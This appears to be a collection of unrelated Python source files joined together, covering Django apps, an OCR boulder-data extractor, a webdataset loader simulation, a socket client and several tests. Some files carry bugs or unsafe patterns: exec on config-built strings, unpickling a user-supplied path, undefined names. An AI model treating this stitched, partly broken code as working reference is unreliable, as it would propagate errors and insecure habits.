txt_back_home.click()
print("Back to Admin HomePage")
driver.close()
admin_Portal()
|
from django.shortcuts import render
# from ..{{OTHER_APP}}.models import {{MODEL}}
def index( request ):
context = {
'models': {
# '{{MODEL}}': {{MODEL}}.objects.all(),
}
}
return render( request, "models_view/index.html", context )
|
import numpy as np
import logging
import os
import time
class mp_model:
id = None
logger = None
type = 'empty'
history = []
cfg = {}
# class instances
network = None
dataset = None
machine = None
def __init__(self, config = None, network = None, dataset = None):
# initialize logger
self.logger = logging.getLogger('metapath')
# initialize id
self.id = int(time.time() * 100)
# reference network and dataset
self.network = network
self.dataset = dataset
# create empty model instance if no configuration is given
if not config:
return
# configure machine
self.configure(config = config, network = network, dataset = dataset)
# initialize machine
self.initialize()
# configure model
def configure(self, config = None, network = None, dataset = None):
if not config == None:
self.cfg = config
elif self.cfg == None:
self.logger.warning('could not configure model: no configuration was given!')
return False
# reference network instance
if not network == None:
self.network = network
elif self.network == None:
self.logger.warning('could not configure model: no network was given!')
return False
# reference dataset instance
if not dataset == None:
self.dataset = dataset
elif self.dataset == None:
self.logger.warning('could not configure model: no network was given!')
return False
# create machine instance
self.configure_machine()
# configure machine
def configure_machine(self):
params = {
'visible': self.network.nodes(type = 'e') + self.network.nodes(type = 's'),
'hidden': self.network.nodes(type = 'tf'),
'edges': self.network.edges(),
'init': self.cfg['init'],
'data': self.dataset.data}
class_name = self.cfg['class'].upper()
package_name = 'src.mp_model_' + class_name.lower()
try:
exec "from %s import %s" % (package_name, class_name)
exec "self.machine = %s(**params)" % (class_name)
self.type = class_name
except:
self.machine = None
self.logger.warning("model class '" + class_name + "' is not supported!")
return
# initialize model parameters to dataset
def initialize(self, dataset = None):
if not dataset == None:
self.dataset = dataset
elif self.dataset == None:
self.logger.warning('could not initialize model: no dataset was given!')
return False
if self.machine == None:
self.logger.warning('could not initialize model: model has not been configured!')
return False
# search network in dataset and exclude missing nodes
cache = self.dataset.cfg['cache_path'] + \
'data-network%s-dataset%s.npz' % \
(self.network.cfg['id'], self.dataset.cfg['id'])
if os.path.isfile(cache):
self.logger.info(' * found cachefile: "' + cache + '"')
self.dataset.load(cache)
else:
self.logger.info(' * search network nodes in dataset and exclude missing')
label_format = self.network.cfg['label_format']
label_lists = {
's': self.network.node_labels(type = 's'),
'e': self.network.node_labels(type = 'e')}
self.dataset = self.dataset.subset(label_format, label_lists)
self.dataset.update_from_source()
self.logger.info(' * create cachefile: "' + cache + '"')
self.dataset.save(cache)
# update network to available data
for type in self.dataset.sub:
self.network.update(nodelist = {
'type': type,
'list': self.dataset.sub[type]})
# update model to network
self.configure()
# normalize data
self.dataset.normalize()
# initialize model parameters with data
self.machine.initialize(self.dataset.data)
# optimize model
def optimize(self, **params):
# append current model parameters to model history
self.history.append({self.id: self.machine.get()})
# optimize model
self.machine.run(self.dataset.data, **params)
# update model id
self.id = int(time.time() * 100)
# get all model parameters as dictionary
def get(self):
dict = {
'id': self.id,
'type': self.type,
'history': self.history,
'cfg': self.cfg,
'network': self.network.get(),
'dataset': self.dataset.get(),
'machine': self.machine.get()
}
return dict
def set(self, dict):
self.id = dict['id']
self.type = dict['type']
self.history = dict['history']
self.cfg = dict['cfg']
self.network.set(**dict['network'])
self.dataset.set(**dict['dataset'])
self.configure_machine()
self.machine.set(**dict['machine'])
#
# getter methods for model simulations
#
def get_approx(self, type = 'rel_approx'):
if type == 'rel_approx':
v_approx = self.machine.v_rel_approx(self.dataset.data)
elif type == 'abs_approx':
v_approx = self.machine.v_abs_approx(self.dataset.data)
# calc mean
mean_approx = np.mean(v_approx)
# create node dictionary
v_label = self.machine.v['label']
approx_dict = {}
for i, node in enumerate(v_label):
approx_dict[node] = v_approx[i]
return mean_approx, approx_dict
def get_knockout_approx(self):
h_knockout_approx = self.machine.h_knockout_approx(self.dataset.data)
v_knockout_approx = self.machine.v_knockout_approx(self.dataset.data)
# create node dictionary
approx_dict = {}
v_label = self.machine.v['label']
for i, node in enumerate(v_label):
approx_dict[node] = v_knockout_approx[i]
h_label = self.machine.h['label']
for i, node in enumerate(h_label):
approx_dict[node] = h_knockout_approx[i]
return approx_dict
def get_knockout_matrix(self):
v_impact_on_v, v_impact_on_h = self.machine.v_knockout(self.dataset.data)
return v_impact_on_v
# get weights
def get_weights(self, type = 'weights'):
weights = {}
if type == 'weights':
W = self.machine.W
A = self.machine.A
for v, v_label in enumerate(self.machine.v['label']):
for h, h_label in enumerate(self.machine.h['label']):
if not A[v, h]:
continue
weights[(h_label, v_label)] = W[v, h]
weights[(v_label, h_label)] = W[v, h]
elif type == 'link_energy':
weights_directed = self.machine.link_energy(self.dataset.data)
# make weights symmetric
for (n1, n2) in weights_directed:
if (n1, n2) in weights:
continue
weights[(n1, n2)] = weights_directed[(n1, n2)]
weights[(n2, n1)] = weights_directed[(n1, n2)]
else:
return None
return weights
##
##class GRBM_plot:
##
## def __init__(self):
##
## # initialize logger
## self.logger = logging.getLogger('metapath')
##
## self.label = {
## 'energy': 'Energy = $- \sum \\frac{1}{2 \sigma_i^2}(v_i - b_i)^2 ' +\
## '- \sum \\frac{1}{\sigma_i^2} w_{ij} v_i h_j ' +\
## '- \sum c_j h_j$',
## 'error': 'Error = $\sum (data - p[v = data|\Theta])^2$'
## }
##
## self.density = 1
## self.reset()
##
##
## def reset(self):
## self.data = {
## 'epoch': np.empty(1),
## 'energy': np.empty(1),
## 'error': np.empty(1)
## }
##
## self.buffer = {
## 'energy': 0,
## 'error': 0
## }
##
## self.last_epoch = 0
##
## def set_density(self, updates, points):
## self.density = max(int(updates / points), 1)
##
## def add(self, epoch, v_data, h_data, v_model, h_model, params):
##
## # calculate energy, error etc.
## self.buffer['error'] += params.error(v_data)
## self.buffer['energy'] += params.energy(v_data)
##
## if (epoch - self.last_epoch) % self.density == 0:
## self.data['epoch'] = \
## np.append(self.data['epoch'], epoch)
## self.data['error'] = \
## np.append(self.data['error'], self.buffer['error'] / self.density)
## self.data['energy'] = \
## np.append(self.data['energy'], self.buffer['energy'] / self.density)
##
## # reset energy and error
## self.buffer['error'] = 0
## self.buffer['energy'] = 0
##
## def save(self, path = None):
## if path == None:
## self.logger.error("no save path was given")
## quit()
##
## # create path if not available
## if not os.path.exists(path):
## os.makedirs(path)
##
## for key, val in self.data.items():
## if key == 'epoch':
## continue
##
## file_plot = '%s/%s.pdf' % (path, key.lower())
##
## # get labels
## xlabel = 'updates'
## ylabel = key
##
## plt.figure()
## plt.plot(self.data['epoch'], val, 'b,')
## plt.xlabel(xlabel)
## plt.ylabel(ylabel)
## plt.savefig(file_plot)
|
from django import forms
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from .models import MyUser
class UserRegisterForm(UserCreationForm):
email = forms.EmailField()
first_name = forms.CharField(max_length=30)
last_name = forms.CharField(max_length=30)
class Meta:
model = MyUser
fields = ['email', 'first_name', 'last_name', 'password1', 'password2']
def clean_email(self):
email = self.cleaned_data.get('email')
if MyUser.objects.filter(email__iexact=email).exists():
raise forms.ValidationError('A user has already registered using this email')
return email
def clean_password2(self):
# Check that the two password entries match
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
raise ValidationError("Passwords don't match")
return password2
def save(self, commit=True):
# Save the provided password in hashed format
user = super().save(commit=False)
user.username = self.clean_email()
user.set_password(self.cleaned_data["password1"])
if commit:
user.save()
return user
class UserLoginForm(AuthenticationForm):
class Meta:
model = MyUser
fields = ['email', 'password']
|
import sys
import os
import warnings
import torch
import webdataset as wds
import typer
import braceexpand
from collections import Counter
from itertools import islice
from torchvision import transforms
# We're not using actual torch.distributed, since we just want to simulate
# how data is split between different nodes. Other than that, though, this
# code works the same way as true distributed code.
dist_rank = -1
dist_size = -1
show_splits = False
def split_by_node(urls):
"""Split urls for each node.
This uses the rank and world size. Note that it is invoked in each worker,
so the results need to be consistent between multiple invocations."""
global dist_rank, dist_size
if dist_rank >= 0 and dist_size > 0:
result = urls[dist_rank::dist_size]
if show_splits:
print(
f"split_by_node {dist_rank}/{dist_size} len={len(result)}",
file=sys.stderr,
)
return result
else:
print(f"single node len={len(result)}")
return urls
def split_by_worker(urls):
"""Split urls for each worker."""
urls = [url for url in urls]
worker_info = torch.utils.data.get_worker_info()
if worker_info is not None:
wid = worker_info.id
num_workers = worker_info.num_workers
if wid == 0 and len(urls) < num_workers:
warnings.warn(f"num_workers {num_workers} > num_shards {len(urls)}")
result = urls[wid::num_workers]
if show_splits:
print(
f"split_by_worker {wid}/{num_workers} len={len(result)}",
file=sys.stderr,
)
return result
else:
return urls
def make_loader(shards, batch_size=128, num_workers=6, partial=False, repeat=1):
"""Create a loader for Imagenet-like data.
The `partial` argument is passed on to the `batched()` method.
Note that if `partial` is True, each worker may return a partial batch."""
augment = transforms.Compose(
[
transforms.RandomResizedCrop(224),
transforms.ToTensor(),
]
)
dataset = (
wds.WebDataset(shards, nodesplitter=split_by_node, splitter=split_by_worker)
.shuffle(1000)
.decode("pil")
.to_tuple("jpg", "cls")
.map_tuple(augment)
.batched(batch_size, partial=partial)
)
if repeat > 1:
dataset = dataset.repeat(repeat)
loader = wds.WebLoader(dataset, num_workers=num_workers, batch_size=None)
return loader
def train(
# shards: str = "pipe:gsutil cat gs://lpr-simsplit/split-{000000..00009}.tar",
shards: str = "pipe:curl -s -L http://storage.googleapis.com/lpr-simsplit/split-{000000..00009}.tar",
size: int = 3,
batch_size: int = 10,
nworkers: int = 3,
nepochs: int = 1,
nbatches: int = 999999,
partial: bool = False,
showopen: bool = False,
showsplits: bool = False,
repeat: int = 1,
dsrepeat: int = 1,
):
"""Simulate distributed training.
This will perform dataset loading for each worker in a distributed training
job of size `size` and report the number of batches and samples returned by
each worker.
For distributed SGD (DistributedDataParallel) to work, each worker needs to return
exactly the same number of batches. To get exact epochs, you need to ensure that
all the shards have exactly the same number of samples and that the number of shards
is divisible by (#workers * #nodes).
If your data isn't in that form (and it usually isn't), you have to do something different.
"""
print("parameters:")
print(f"\tworldsize {size}")
print(f"\tnworkers {nworkers}")
print(f"\tnshards {len(list(braceexpand.braceexpand(shards)))}")
print(f"\tpartial {partial}")
print(f"\tnbatches {nbatches}")
print(f"\tloader-repeat {repeat}")
print(f"\tdataset-repeat {dsrepeat}")
print()
global dist_size, dist_rank, show_splits
show_splits = showsplits
if showopen:
os.environ["GOPEN_VERBOSE"] = "1"
dist_size = size
loader = make_loader(
shards,
batch_size=batch_size,
num_workers=nworkers,
partial=partial,
repeat=dsrepeat,
)
if repeat > 1:
loader = loader.repeat(nepochs=repeat)
batches = []
for rank in range(size):
dist_rank = rank
batches.append([])
for inputs, targets in islice(loader, 0, nbatches):
batches[-1].append(len(inputs))
# print(f"=== rank {dist_rank} batches {len(batches[-1])} total {np.sum(batches[-1])}")
print(f"rank {rank}:", Counter(batches[-1]).most_common())
counted = [tuple(Counter(x).most_common()) for x in batches]
if not all([c == counted[0] for c in counted]):
print("\nFAILED: inconsistent batches in different workers")
else:
print("\nSUCCESS: same batches in all workers")
if __name__ == "__main__":
typer.run(train)
|
# -*- coding: utf-8 -*-
import threading
from socket import *
from QueueTeam import PackQueueClass
class SendPackData:
def __init__(self,hostIp,hostPort):
self.hostIp=hostIp
self.hostPort=hostPort
self.tcpCliSock=""
self.packThread=None
self.sendPack=PackQueueClass()
def connectHost(self):
try:
self.tcpCliSock=socket(AF_INET,SOCK_STREAM)
self.tcpCliSock.connect((self.hostIp,self.hostPort))
#向服务端发数据线程
self.packThread=threading.Thread(target=self.sendData,args=())
self.packThread.start()
except Exception,e:
print 'Error: ',e
#发送数据线程函数
def sendData(self):
try:
while True:
packData=self.sendPack.getPackData()
#向服务器发包
self.tcpCliSock.sendall(packData)
self.tcpCliSock.close()
except:
print("sendData is fail")
#清理线程函数
def clearThread(self):
self.packThread.join()
self.packThread=None
|
from functools import total_ordering
import json
import pickle
import re
import sys
from os import name
import numpy as np
from numpy.core.fromnumeric import size
from numpy.lib.utils import byte_bounds
import pandas as pd
# Convert from path reutrns a list of PIL images making it very easy to use
from pdf2image import convert_from_path
from PIL import Image
import cv2
import NLP_helper
import OCR_helper as OCR
import SPL_helper as SPL
# This is the main entry point function for the project, it takes a number as an argument and will run a complete boulder data extraction over whatever volume is specified
def review_vol(number, page_number=None, print_page=None):
patch = False
if page_number is None:
page_number = int(input("Please enter starting page number : "))
# Reports 3 and 4 are a different structure being entries in a journal and have 4 pages to an image.
# if number == "3" or number == "4":
# return print_vol(number)
print("Reviewing volume : " + str(number))
print("Running OCR and Spellchecker...")
# Getting the OCR'ed and Spellchecked volume back in a word_string and dataframe
word_data, word_string = SPL.get_spellchecked_volume(number)
# Saving this data so we don't need to OCR and Spellcheck every time
with open('word_data_' + str(number) + '.pickle', 'wb') as f:
pickle.dump((word_data, page_number, number), f)
# Get boulders using NLP techniques.. Also an entry point for the saved OCR to be analysed
df, df_for_saving = get_boulders(word_data,number,page_number,print_page)
print("All done!")
# Print whole dataframe
pd.set_option("display.max_rows", None, "display.max_columns", None)
print(df)
# Saving output
with open('report_'+ str(number) + '_boulders.pickle', 'wb') as f:
pickle.dump((word_data, df, page_number, number), f)
df_for_saving.to_csv("boulder_data" + str(number) + '.csv')
# TODO: Entry point for analysing the OCR'ed data.. Will need to be expanded to include multiple page spanning analysis and more search terms, not just boulder.
def get_boulders(word_data, number, page_number=None, print_page=None):
numbers = []
locations = []
sizes = []
rocktypes = []
authors = []
extras = []
compass_directions = []
distances = []
volumes = []
weights = []
hasls = []
array_numberofboulders = []
page_numbers = []
full_boundings = []
loc_boundings = []
siz_boundings = []
rt_boundings = []
b_boundings = []
aut_boundings = []
compass_boundings = []
par_nums = []
extra_boundings = []
number = 0
if page_number is None:
page_number = int(input("What page number did the scan start at? : "))
if print_page is None:
print_page = True if input("Would you like to print each page? ( enter y or n ) : ") == 'y' else False
print("Running NLP...")
WINDOW_NAME = "Page : "
if print_page:
cv2.namedWindow(WINDOW_NAME, cv2.WINDOW_NORMAL)
cv2.startWindowThread()
general_location = ""
# For each dataframe in word_data ie each page :
for i in range(0,len(word_data)):
print("Analysing page : " + str(page_number))
img = cv2.cvtColor(np.array(word_data[i][1]), cv2.COLOR_RGB2BGR)
# Trying to remedy the paragraph mismatching from tesseract, This will set any par_num that is recognised as the first par_num to the last
for k, word in word_data[i][0].iterrows():
if word['par_num'] > 1:
break
if len(word_data[i][0]['par_num']):
word_data[i][0].loc[(word_data[i][0].par_num == 1) & (word_data[i][0].index > k), 'par_num'] = max(word_data[i][0]['par_num'])
# Used for discarding multiple mention of same boulder on same page
last_rocktype = ""
last_size = ""
last_location = ""
# Loop through each page
for j, row in word_data[i][0].iterrows():
# For each word check if there is a new general location being mentioned and extract the placename from line and paragraph match
if number == 5 or number == 6 or number == 1 or number == 10:
if '.—' in row['text']:
words = word_data[i][0][(word_data[i][0]['line_num'] == row['line_num']) & (word_data[i][0]['par_num'] == row['par_num']) & (word_data[i][0]['word_num'] <= row['word_num'])]['text'].tolist()
general_location = ''
for word in words:
if len(general_location):
general_location += " " + word
else:
general_location = word
general_location = general_location.split('.—')[0]
# if the word is a boulder related search term, look for the boulders features!
if ("boulder" in row['text'] or "Boulder" in row['text'] or "Block" in row['text'] or "block" in row['text']):
# for whole boulder phrase bounding box
least_x = 1000000
least_y = 1000000
greatest_x_w = -1
greatest_y_h = -1
loc_bound = []
siz_bound = []
rt_bound = []
aut_bound = []
extra_bound = []
compass_bound = []
siz_char_count = 0
# Use paragraph where boulder search term was found for analysis
loc_pos, siz_pos, rt_pos, aut_pos, location, size, rocktype, author, numberofboulders, numbox, extra_pos, extra, dim_dict, volume, weight, hasl, distance, comp_dict, compass_direction = NLP_helper.find_boulder_from_paragraph(word_data[i][0].loc[word_data[i][0]['par_num'] == row['par_num']], number)
if len(general_location) and location:
location = general_location + ' - ' + location
# Boulder and boulder number tagging
if numbox:
(x,y,w,h) = numbox
cv2.rectangle(img, (x, y), (x + w, y + h), (40, 100, 200), 5)
(x, y, w, h) = (row['left'], row['top'], row['width'], row['height'])
cv2.rectangle(img, (x, y), (x + w, y + h), (255, 255, 0), 5)
b_bound = (x,y,x+w,y+h)
# Size tagging and paragraph tagging
for k, word in word_data[i][0].loc[word_data[i][0]['par_num'] == row['par_num']].iterrows():
if word['left'] < least_x:
least_x = word['left']
if word['left'] + word['width'] > greatest_x_w:
greatest_x_w = word['left'] + word['width']
if word['top'] < least_y:
least_y = word['top']
if word['top'] + word['height'] > greatest_y_h:
greatest_y_h = word['top'] + word['height']
if siz_pos:
for dim in siz_pos:
if (siz_char_count >= siz_pos[dim][0] and siz_char_count <= siz_pos[dim][1]):
(x, y, w, h) = (word['left'], word['top'], word['width'], word['height'])
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 5)
siz_bound.append((x,y,x+w,y+h))
siz_char_count += len(word['text']) + 1
if dim_dict:
for dim in dim_dict:
for (x,y,w,h) in dim_dict[dim]:
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 5)
siz_bound.append((x,y,x+w,y+h))
# Primary and Secondary rocktype tagging
if rt_pos:
for dim in rt_pos:
for (x,y,w,h) in rt_pos[dim]:
cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 5)
rt_bound.append((x,y,x+w,y+h))
if extra_pos:
for dim in extra_pos:
for (x,y,w,h) in extra_pos[dim]:
cv2.rectangle(img, (x, y), (x + w, y + h), (147,20,255), 5)
extra_bound.append((x,y,x+w,y+h))
# Tagging of Authors (People mentioned or excerpt references)
if aut_pos:
for dim in aut_pos:
for (x,y,w,h) in aut_pos[dim]:
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 255), 5)
aut_bound.append((x,y,x+w,y+h))
# Tagging locations and compass directions
if loc_pos:
for dim in loc_pos:
for (x,y,w,h) in loc_pos[dim]:
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 5)
loc_bound.append((x,y,x+w,y+h))
if comp_dict:
for dim in comp_dict:
for (x,y,w,h) in comp_dict[dim]:
cv2.rectangle(img, (x, y), (x + w, y + h), (200, 70, 10), 5)
compass_bound.append((x,y,x+w,y+h))
# If no location is found try setting the location to the last boulder on same pages location if not
# just use the general location
if not location and len(locations) and page_number == page_numbers[len(page_numbers) - 1]:
location = locations[len(locations) - 1]
loc_pos = loc_boundings[len(loc_boundings) - 1]
elif not location and len(general_location):
location = general_location
# For last_x matching
if not location:
location = ""
if not size:
size = ""
if not rocktype:
rocktype = ""
if not (location == last_location and size == last_size and rocktype == last_rocktype):
last_rocktype = rocktype
last_size = size
last_location = location
# Increase the paragraph bounding box for easy viewing and highlight on page
least_y -= 100
least_x -= 100
greatest_y_h += 100
greatest_x_w += 100
cv2.rectangle(img, (least_x, least_y), (greatest_x_w, greatest_y_h), (255, 0, 255), 8)
# Fill data into arrays
numbers.append(number)
number += 1
locations.append(location)
sizes.append(size)
rocktypes.append(rocktype)
authors.append(author)
extras.append(extra)
array_numberofboulders.append(numberofboulders)
compass_directions.append(compass_direction)
distances.append(distance)
volumes.append(volume)
weights.append(weight)
hasls.append(hasl)
aut_boundings.append(aut_bound)
page_numbers.append(page_number)
loc_boundings.append(loc_bound)
siz_boundings.append(siz_bound)
rt_boundings.append(rt_bound)
b_boundings.append(b_bound)
compass_boundings.append(compass_bound)
extra_boundings.append(extra_bound)
full_boundings.append((least_x,least_y,greatest_x_w,greatest_y_h))
par_nums.append(row['par_num'])
if print_page:
print(word_data[i][0])
d = {'Numbers' : numbers, 'Location': locations, 'Size' : sizes, 'Rocktype' : rocktypes, 'Volume' : volumes, 'Weight' : weights, 'HASL' : hasls, 'Compass' : compass_directions, 'Distance' : distances, 'Page_Number' : page_numbers, 'BNum' : array_numberofboulders, 'Extra' : extras, 'EBB' : extra_boundings, 'Author' : authors, 'ABB' : aut_boundings, 'FullBB' : full_boundings, 'BBB' : b_boundings, 'LBB' : loc_boundings, 'SBB' : siz_boundings, 'RBB' : rt_boundings, 'CBB' : compass_boundings, 'par_num' : par_nums}
print(d)
cv2.imshow("Page : " + str(page_number), img)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.waitKey(1)
page_number += 1
# Formatted for CSV
d_for_saving = {'Numbers' : numbers, 'Location': locations, 'Size' : sizes, 'Rocktype' : rocktypes, 'Volume' : volumes, 'Weight' : weights, 'Height above sea level' : hasls, 'Compass' : compass_directions, 'Distance' : distances, 'Number of Boulders mentioned' : array_numberofboulders, 'Extra' : extras, 'Author' : authors, 'Paragraph' : par_nums, 'Page' : page_numbers}
df_for_saving = pd.DataFrame(data=d_for_saving)
d = {'Numbers' : numbers, 'Location': locations, 'Size' : sizes, 'Rocktype' : rocktypes, 'Volume' : volumes, 'Weight' : weights, 'HASL' : hasls, 'Compass' : compass_directions, 'Distance' : distances, 'Page_Number' : page_numbers, 'BNum' : array_numberofboulders, 'Extra' : extras, 'EBB' : extra_boundings, 'Author' : authors, 'ABB' : aut_boundings, 'FullBB' : full_boundings, 'BBB' : b_boundings, 'LBB' : loc_boundings, 'SBB' : siz_boundings, 'RBB' : rt_boundings, 'CBB' : compass_boundings, 'par_num' : par_nums}
df = pd.DataFrame(data=d)
return df, df_for_saving
# For volumes 3 and 4 just to print the data and not fully analyse it..
def print_vol(number):
print("Reviewing volume : " + str(number))
print("Running OCR and Spellchecker...")
word_data, word_string = SPL.get_spellchecked_volume_for_printing(number)
# This regex splits paragraphs over "X. ..." meaning any paragraph mentioning a numbered boulder will be assessed, this will need extra
# consideration for the later volumes where they change the labeling standarads
matches = re.findall("([\d]+\. )(.*?)(?=([\d]+\.)|($))",word_string)
numbers = []
locations = []
sizes = []
rocktypes = []
print("Running NLP...")
# Ie for boulder paragraph in report..
for match in matches:
if len(match[1]) > 5:
number, location, size, rocktype = NLP_helper.find_boulder_from_numbered_regex(match)
numbers.append(number)
locations.append(location)
sizes.append(size)
rocktypes.append(rocktype)
d = {'Boulder Number': numbers, 'Boulder Location': locations, 'Boulder Size' : sizes, 'Boulder Rocktype' : rocktypes}
df = pd.DataFrame(data=d)
print(df)
return df
# Basic functions I wrote for testing the OCR ..
def print_all_volumes():
for i in range(3,8):
images = convert_from_path("./bouldercopies/" + str(i) + "_Report.pdf", 500)
for image in images:
OCR.print_from_image(image)
def print_one_volume(number):
images = convert_from_path("./bouldercopies/" + str(number) + "_Report.pdf", 500)
for image in images:
OCR.print_from_image(image)
def analyse_everything():
report_nums = [(1,21),(3,0),(4,0),(5,3),(6,3),(7,3),(8,3),(9,193),(10,769)]
for report, page_num in report_nums:
review_vol(report,page_num,False)
# two optional arguments, either no arguments then you will be prompted for a number, enter a number, or enter the path to the word_data and word_string !
if len(sys.argv) == 2:
if sys.argv[1] == '-a':
analyse_everything()
else:
review_vol(sys.argv[1])
elif len(sys.argv) == 3:
if sys.argv[1] != '-l':
print("use -l to use preloaded data")
raise
with open(sys.argv[2], 'rb') as f:
loaded_data = pickle.load(f)
if len(loaded_data) == 4:
# Checking if it's a boulder file or a word_data file
word_data, boulders, page_number, report_number = loaded_data
elif len(loaded_data) == 3:
word_data, page_number, report_number = loaded_data
else:
print(loaded_data)
raise("Incorrect pickle")
df, df_for_saving = get_boulders(word_data,report_number,page_number)
print("All done!")
pd.set_option("display.max_rows", None, "display.max_columns", None)
print(df)
with open('report_'+ str(report_number) + '_boulders.pickle', 'wb') as f:
pickle.dump((word_data, df, page_number, report_number), f)
df_for_saving.to_csv("report_" + str(report_number) + ".csv")
else:
review_vol(input("Please input number of report to review : "))
|
"""animals URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from .views import list_family_animals, show_animal_info, list_animals
urlpatterns = [
path('family/<int:id>' ,list_family_animals),
path('animal/<int:id>' ,show_animal_info),
path('animals' ,list_animals),
]
|
import numpy
import re
import pytest
import builtins
from unittest import mock
def swap_case():
line = input('')
return line.swapcase()
def test_swap_case_1():
with mock.patch.object(builtins, 'input', side_effect=['HackerRank.com presents "Pythonist 2".']):
assert swap_case()=='hACKERrANK.COM PRESENTS "pYTHONIST 2".'
def test_swap_case_2():
with mock.patch.object(builtins, 'input', side_effect=['22T6M2reD4']):
assert swap_case()=='22t6m2REd4'
def test_swap_case_3():
with mock.patch.object(builtins, 'input', side_effect=[
'SG.2ehL62pSmsnd7c9XYYsFvV067gybBhsSM0SJ7zpAJWr8pwEFzq3ACtuSAjpL7ZnWXbASGlBnEawSnWs1 gpCySKB2.at bt5S']):
assert swap_case()==\
'sg.2EHl62PsMSND7C9xyySfVv067GYBbHSsm0sj7ZPajwR8PWefZQ3acTUsaJPl7zNwxBasgLbNeAWsNwS1 GPcYskb2.AT BT5s'
|
# Copyright 2023 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.python.framework.stevedore.python_target_dependencies import (
InferStevedoreNamespacesDependencies,
PythonTestsStevedoreNamespaceInferenceFieldSet,
StevedoreExtensions,
)
from pants.backend.python.framework.stevedore.python_target_dependencies import (
rules as stevedore_dep_rules,
)
from pants.backend.python.framework.stevedore.target_types import (
AllStevedoreExtensionTargets,
StevedoreExtensionTargets,
StevedoreNamespace,
StevedoreNamespacesField,
StevedoreNamespacesProviderTargetsRequest,
)
from pants.backend.python.macros.python_artifact import PythonArtifact
from pants.backend.python.target_types import (
PythonDistribution,
PythonSourcesGeneratorTarget,
PythonSourceTarget,
PythonTestsGeneratorTarget,
PythonTestTarget,
)
from pants.backend.python.target_types_rules import rules as python_target_types_rules
from pants.engine.addresses import Address
from pants.engine.target import InferredDependencies
from pants.testutil.rule_runner import QueryRule, RuleRunner
from pants.util.frozendict import FrozenDict
# random set of runner names to use in tests
st2_runners = ["noop", "python", "foobar"]
def write_test_files(rule_runner: RuleRunner, extra_build_contents: str = ""):
for runner in st2_runners:
rule_runner.write_files(
{
f"runners/{runner}_runner/BUILD": dedent(
f"""\
python_distribution(
provides=python_artifact(
name="stackstorm-runner-{runner}",
),
entry_points={{
stevedore_namespace("st2common.runners.runner"): {{
"{runner}": "{runner}_runner.{runner}_runner",
}},
stevedore_namespace("some.thing.else"): {{
"{runner}": "{runner}_runner.thing",
}},
}},
)
"""
)
+ extra_build_contents.format(runner=runner),
f"runners/{runner}_runner/{runner}_runner/BUILD": "python_sources()",
f"runners/{runner}_runner/{runner}_runner/__init__.py": "",
f"runners/{runner}_runner/{runner}_runner/{runner}_runner.py": "",
f"runners/{runner}_runner/{runner}_runner/thing.py": "",
}
)
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*python_target_types_rules(),
*stevedore_dep_rules(),
QueryRule(AllStevedoreExtensionTargets, ()),
QueryRule(StevedoreExtensions, ()),
QueryRule(StevedoreExtensionTargets, (StevedoreNamespacesProviderTargetsRequest,)),
QueryRule(InferredDependencies, (InferStevedoreNamespacesDependencies,)),
],
target_types=[
PythonDistribution,
PythonSourceTarget,
PythonSourcesGeneratorTarget,
PythonTestTarget,
PythonTestsGeneratorTarget,
],
objects={
"python_artifact": PythonArtifact,
"stevedore_namespace": StevedoreNamespace,
},
)
write_test_files(rule_runner)
args = [
"--source-root-patterns=runners/*_runner",
]
rule_runner.set_options(args, env_inherit={"PATH", "PYENV_ROOT", "HOME"})
return rule_runner
# -----------------------------------------------------------------------------------------------
# Tests for utility rules
# -----------------------------------------------------------------------------------------------
def test_find_all_stevedore_extension_targets(rule_runner: RuleRunner) -> None:
assert rule_runner.request(AllStevedoreExtensionTargets, []) == AllStevedoreExtensionTargets(
rule_runner.get_target(Address(f"runners/{runner}_runner"))
for runner in sorted(st2_runners)
)
def test_map_stevedore_extensions(rule_runner: RuleRunner) -> None:
assert rule_runner.request(StevedoreExtensions, []) == StevedoreExtensions(
FrozenDict(
{
StevedoreNamespace("some.thing.else"): tuple(
rule_runner.get_target(Address(f"runners/{runner}_runner"))
for runner in sorted(st2_runners)
),
StevedoreNamespace("st2common.runners.runner"): tuple(
rule_runner.get_target(Address(f"runners/{runner}_runner"))
for runner in sorted(st2_runners)
),
}
)
)
def test_find_python_distributions_with_entry_points_in_stevedore_namespaces(
rule_runner: RuleRunner,
) -> None:
rule_runner.write_files(
{
"src/foobar/BUILD": dedent(
"""\
python_tests(
name="tests",
stevedore_namespaces=["some.thing.else"],
)
"""
),
"src/foobar/test_something.py": "",
}
)
# use set as the order of targets is not consistent and is not easily sorted
assert set(
rule_runner.request(
StevedoreExtensionTargets,
[
StevedoreNamespacesProviderTargetsRequest(
rule_runner.get_target(Address("src/foobar", target_name="tests")).get(
StevedoreNamespacesField
)
),
],
)
) == set(
StevedoreExtensionTargets(
(
rule_runner.get_target(Address(f"runners/{runner}_runner"))
for runner in sorted(st2_runners)
)
)
)
# -----------------------------------------------------------------------------------------------
# Tests for dependency inference of python targets (python_tests)
# -----------------------------------------------------------------------------------------------
def test_infer_stevedore_namespace_dependencies(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/foobar/BUILD": dedent(
"""\
python_tests(
name="tests",
stevedore_namespaces=["st2common.runners.runner"],
)
"""
),
"src/foobar/test_something.py": "",
}
)
def run_dep_inference(address: Address) -> InferredDependencies:
target = rule_runner.get_target(address)
return rule_runner.request(
InferredDependencies,
[
InferStevedoreNamespacesDependencies(
